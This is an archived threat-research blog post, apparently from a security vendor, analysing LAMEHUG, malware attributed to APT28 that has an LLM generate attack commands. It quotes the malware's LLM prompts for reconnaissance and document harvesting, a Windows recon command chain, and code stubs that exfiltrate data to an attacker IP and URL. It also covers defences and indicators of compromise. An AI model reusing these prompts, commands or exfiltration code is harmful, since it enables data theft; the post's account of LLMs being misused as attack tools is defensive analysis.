{ "id": "bd044c41-61a6-4398-9679-ae5038af8997", "created_at": "2026-04-06T00:21:34.575979Z", "updated_at": "2026-04-10T03:37:49.770294Z", "deleted_at": null, "sha1_hash": "caaae9bdb5f10d917eccc025d277fe2e5e7865ce", "title": "Cato CTRL™ Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 95562, "plain_text": "Cato CTRL™ Threat Research: Analyzing LAMEHUG – First Known\r\nLLM-Powered Malware with Links to APT28 (Fancy Bear)\r\nBy null\r\nPublished: 2025-07-23 · Archived: 2026-04-05 17:40:30 UTC\r\nExecutive Summary \r\nOn July 17, 2025, Ukraine’s Computer Emergency Response Team (CERT-UA) publicly reported LAMEHUG, which is\r\nbeing documented as the first known malware that integrates large language model (LLM) capabilities directly into its attack\r\nmethodology.  \r\nKey Facts: \r\nDiscovery Date: July 10, 2025 \r\nAttribution: APT28 (Fancy Bear) with moderate confidence, according to CERT-UA. \r\nTarget: Ukrainian government officials. \r\nAttack Vector: Phishing emails impersonating Ukrainian ministry officials and containing ZIP archives with\r\nPyInstaller-compiled Python executables. \r\nTechnical Innovation: Malware uses LLM Qwen2.5-Coder-32B-Instruct for real-time command generation. Our\r\nanalysis is that APT28 used approximately 270 Hugging Face tokens for authentication. \r\nAssessment: Proof-of-concept (PoC) exploration of LLM integration in state-sponsored cyber operations.  \r\nTechnical Overview \r\nInitial Discovery and Distribution \r\nThe LAMEHUG campaign began when CERT-UA received reports about suspicious email distribution among Ukrainian\r\ngovernment officials. The emails appeared to be sent from representatives of relevant ministries, containing an attachment\r\nnamed “Додаток.pdf.zip” (Attachment.pdf.zip). \r\nLLM Integration  \r\nLAMEHUG’s defining characteristic is its integration of AI for dynamic attack generation. According to CERT-UA’s alert,\r\nthe malware “uses the LLM Qwen2.5-Coder-32B-Instruct via the huggingface[.]co service API to generate commands based\r\non statically entered text (description) for their subsequent execution on a computer.”  \r\nLAMEHUG Variants  \r\nThe ZIP archive contained an executable file with a “.pif” extension, which was converted from Python source code using\r\nPyInstaller. CERT-UA discovered multiple variants of the LAMEHUG malware: \r\nДодаток.pif (Attachment.pif) \r\nsave_document.py \r\nAI_generator_uncensored_Canvas_PRO_v0.9.exe \r\nAI_image_generator_v0.95.exe \r\nimage.py \r\nThese variants demonstrated functional differences in data exfiltration methods, indicating ongoing development and\r\nadaptation of the malware family. \r\nReverse Engineering: The Actual Prompts \r\nOur analysis of the malware samples revealed the exact prompts being sent to the LLM. The malware uses base64-encoded\r\nprompts to obscure its intentions.  \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 1 of 6\n\nFigure 1. Додаток.pif.pdf (Attachment.pif.pdf) that the user sees while the malware is being executed \r\nPrompt Analysis of Додаток.pif Variant \r\nДодаток.pif\r\nFigure 2. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #1) \r\nДодаток.pif\r\nFigure 3. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #2) \r\nFigure 4. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #3) \r\nThe Додаток.pif variant uses two specific prompts: \r\n1. System Information Gathering Prompt: “Make a list of commands to create folder C:\\Programdata\\info and to\r\ngather computer information, hardware information, process and services information, networks information, AD\r\ndomain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info.txt. Return only\r\ncommands, without markdown.” \r\n2. Document Harvesting Prompt: “Make a list of commands to copy recursively different office and pdf/txt\r\ndocuments in user Documents, Downloads and Desktop folders to a folder c:\\Programdata\\info\\ to execute in one\r\nline. Return only command, without markdown.” \r\nPrompt Analysis of AI Image Generator Variants \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 2 of 6\n\nimage.py_prompts\r\nFigure 5. image.py prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model \r\nThe AI image generator variants (AI_generator_uncensored_Canvas_PRO_v0.9.exe and AI_image_generator_v0.95.exe)\r\nuse a provocative image generation prompt as a lure: \r\n“Curvy naked woman sitting, long beautiful legs, front view, full body view, visible face.” \r\nThese variants contact the Flux AI image generator API (https://router.huggingface.co/nebius/v1/images/generations) while\r\nsimultaneously executing the same data collection and exfiltration routines in the background. \r\nMalware Operation Flow \r\nBased on our analysis, LAMEHUG operates through the following process: \r\n1. Prompt Generation: The malware contains pre-defined, base64-encoded text descriptions of desired attack\r\nobjectives.  \r\n2. API Communication: The malware sends these prompts to the Qwen2.5-Coder-32B-Instruct model via Hugging\r\nFace’s API using approximately 270 tokens for authentication. \r\n3. Command Generation: The LLM responds with executable command sequences tailored to the requested\r\nobjective.  \r\n4. Real-Time Execution: The malware immediately executes the AI-generated commands on the target system.  \r\nExfiltration Methods \r\nThe malware implements two different exfiltration methods depending on the variant.  \r\nSFTP Exfiltration (image.py variant) \r\ndef ssh_send(path):\r\n address = '144[.]126[.]202[.]227'\r\n port = 22\r\n username = 'upstage'\r\n password = 'upstage'\r\n target_path = '/tmp/upl/'\r\n # [SFTP upload logic]\r\nHTTP POST Exfiltration (Додаток.pif variant) \r\ndef send(path):\r\n url = 'https[:]//stayathomeclasses[.]com/slpw/up[.]php'\r\n # [HTTP POST upload logic]\r\nLLM-Generated Command Analysis \r\nCERT-UA documented the actual command sequence generated by the LLM integration, demonstrating the sophisticated\r\nreconnaissance capabilities achieved through dynamic AI generation.  \r\ncmd.exe /c \"mkdir %PROGRAMDATA%\\info \u0026\u0026 systeminfo \u003e\u003e %PROGRAMDATA%\\info\\info.txt \u0026\u0026 wmic computersystem get name,manufac\r\nThis comprehensive command sequence demonstrates the LLM’s ability to generate extensive system reconnaissance\r\ncommands that collect: \r\nHardware and System Information: wmic, systeminfo \r\nRunning Processes and Services: tasklist, net start \r\nNetwork Configuration Details: ipconfig, wmic nic \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 3 of 6\n\nUser and Group Information: whoami, dsquery \r\nComplete Active Directory (AD) Structure Enumeration: full use of dsquery \r\nAttribution Assessment: APT28 Testing New Capabilities \r\nCERT-UA attributes the LAMEHUG campaign to APT28 (Fancy Bear) with moderate confidence. APT28 is associated with\r\nRussia’s Main Intelligence Directorate (GRU) Unit 26165. \r\nWhy This Appears to Be PoC Testing \r\nBased on our analysis of the actual malware code and operational characteristics, several factors suggest APT28 is testing\r\nnew LLM capabilities rather than executing a sophisticated operational deployment: \r\n1. Code Simplicity: The Python scripts are relatively basic, lacking the sophisticated evasion techniques typically\r\nassociated with APT28 operations.  \r\n2. Obvious AI Integration: The LLM integration is implemented straightforwardly without attempts to obfuscate or\r\nhide the AI service usage.  \r\n3. Limited Operational Security: The use of easily identifiable prompts and legitimate AI services without advanced\r\nmasking techniques.  \r\n4. Testing Ground: Ukraine has historically served as a testing ground for Russian cyber capabilities, making it an\r\nideal location for PoC deployments.  \r\n5. Multiple Variants: The presence of different variants with varying exfiltration methods suggests experimentation\r\nwith various approaches.  \r\nDetection Challenges for Traditional Security Solutions \r\nLAMEHUG introduces fundamental challenges for traditional cybersecurity approaches: \r\nSignature-based detection fails due to dynamic command generation.  \r\nNetwork traffic appears legitimate (AI API usage).  \r\nBehavioral analysis requires new methodologies specific to LLM-powered threats.  \r\n2025 Cato CTRL™ Threat Report | Download the report\r\nSecurity Best Practices \r\nShadow AI (Visibility and Control)  \r\nThe most critical protection against LAMEHUG-style threats is controlling AI access: \r\nEnforce Approved LLMs Only: Define which generative AI (GenAI) applications users can access and exactly\r\nwhat actions are allowed (upload, download, etc.).  \r\nReal-Time Data Protection: Limit or prevent sensitive data from being uploaded to LLMs, avoiding data security\r\nand confidentiality violations in real-time.  \r\nComprehensive Visibility: Monitor all GenAI usage across the organization with a catalog of 950+ GenAI\r\napplications from Cato CASB.  \r\nNetwork-Level Protection \r\nML-Powered Malware Detection: Cato NGAM uses ML algorithms to detect zero-day and polymorphic malware.  \r\nDNS Security: DNS protection integrated into Cato IPS analyzes DNS queries and responses to block malicious\r\ndomains.  \r\nApplication Control: Monitor and control access to cloud services and APIs, with specific focus on AI platforms.  \r\nExtended Detection and Response \r\nWith Cato XDR, organizations can enable:  \r\nAI/ML Threat Hunting: Continuous ML-based threat hunting and UEBA baseline for every user, host, and app—\r\ndetecting stealthy malware or anomalous behavior that bypasses preventive controls. \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 4 of 6\n\nSmart Investigation: Automatic incident correlation with dynamic risk scoring, displayed in a pivot-enabled analyst\r\nworkbench for quick deep dives from high-level “Story” to raw flows and logs. \r\nOne-Click Response: Built-in remediation enables security analysts to quarantine hosts, deploy new SDP/firewall\r\nrules, or trigger endpoint actions instantly—all from a single console. \r\nLateral Movement Protection \r\nLateral Movement: Cato IPS provides detection, discovery and blocking of lateral movement patterns and\r\nindicators, preventing malware propagation across the WAN.  \r\nZero Trust Network Access \r\nMicrosegmentation: Cato Universal ZTNA allows organizations to segment their networks into smaller parts with\r\nsoftware-defined security perimeters that limit lateral movement.  \r\nConclusion \r\nThe discovery of LAMEHUG by CERT-UA marks a significant milestone in the threat landscape. While this campaign\r\nappears to be a PoC test by APT28 (Fancy Bear), it signals the beginning of a new era where AI is directly incorporated into\r\nmalware operations. The campaign highlights state-sponsored investment in emerging AI technologies for cyber activities,\r\nwith Ukraine serving as the testing ground for these new capabilities. The relatively simple implementation suggests this is\r\nAPT28’s attempt at learning how to weaponize LLMs, likely opening the door for more sophisticated AI-driven campaigns\r\nin the future.  \r\nOrganizations that leverage a SASE platform, such as the Cato SASE Cloud Platform, are better positioned to defend against\r\nemerging AI-powered threats through integrated security controls, behavioral analysis, and advanced threat prevention\r\ncapabilities. As threat actors continue to evolve their tactics to include AI technologies, AI security solutions must evolve to\r\nprovide AI-aware protection mechanisms. \r\nIndicators of Compromise (IoCs) \r\nFile Indicators \r\nMD5 SHA256 Filename\r\nabe531e9f1e642c47260fac40dc41f59 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777 Додаток[.]pif\r\n3ca2eaf204611f3314d802c8b794ae2c d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e AI_generator_uncensored_C\r\nf72c45b658911ad6f5202de55ba6ed5c bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3 AI_image_generator_v0.95[.\r\n81cd20319c8f0b2ce499f9253ce0a6a8 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715 Image[.]py\r\nNetwork Infrastructure \r\nCommand and Control:\r\n144[.]126.202.227 (SFTP server for data exfiltration) \r\nstayathomeclasses[.]com (compromised hosting resource) \r\nhttps://stayathomeclasses[.]com/slpw/up.php (exfiltration endpoint) \r\nDistribution:\r\nboroda70@meta[.]ua (compromised email account) \r\n192[.]36.27.37 (email sending infrastructure via LeVPN) \r\nLLM API Endpoints:\r\nhttps[:]//router[.]huggingface.co/hyperbolic/v1/chat/completions \r\nhttps[:]//router[.]huggingface.co/nebius/v1/images/generations \r\nHost-Based Artifacts \r\n%PROGRAMDATA%\\info\\ (data staging directory) \r\n%PROGRAMDATA%\\info\\info.txt (system information collection file) \r\n%PROGRAMDATA%\\Додаток.pdf (decoy document) \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 5 of 6\n\nSource: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/" ], "report_names": [ "cato-ctrl-threat-research-analyzing-lamehug" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434894, "ts_updated_at": 1775792269, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.pdf", "text": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.txt", "img": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.jpg" } }